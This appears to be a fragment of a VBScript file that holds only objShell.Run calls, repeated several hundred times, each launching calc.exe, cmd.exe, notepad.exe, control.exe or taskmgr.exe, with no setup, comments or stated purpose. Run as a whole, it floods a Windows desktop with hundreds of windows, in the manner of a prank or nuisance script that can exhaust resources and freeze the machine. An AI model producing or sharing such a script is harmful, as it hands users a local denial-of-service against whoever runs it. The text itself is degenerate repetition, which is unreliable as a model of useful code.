objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
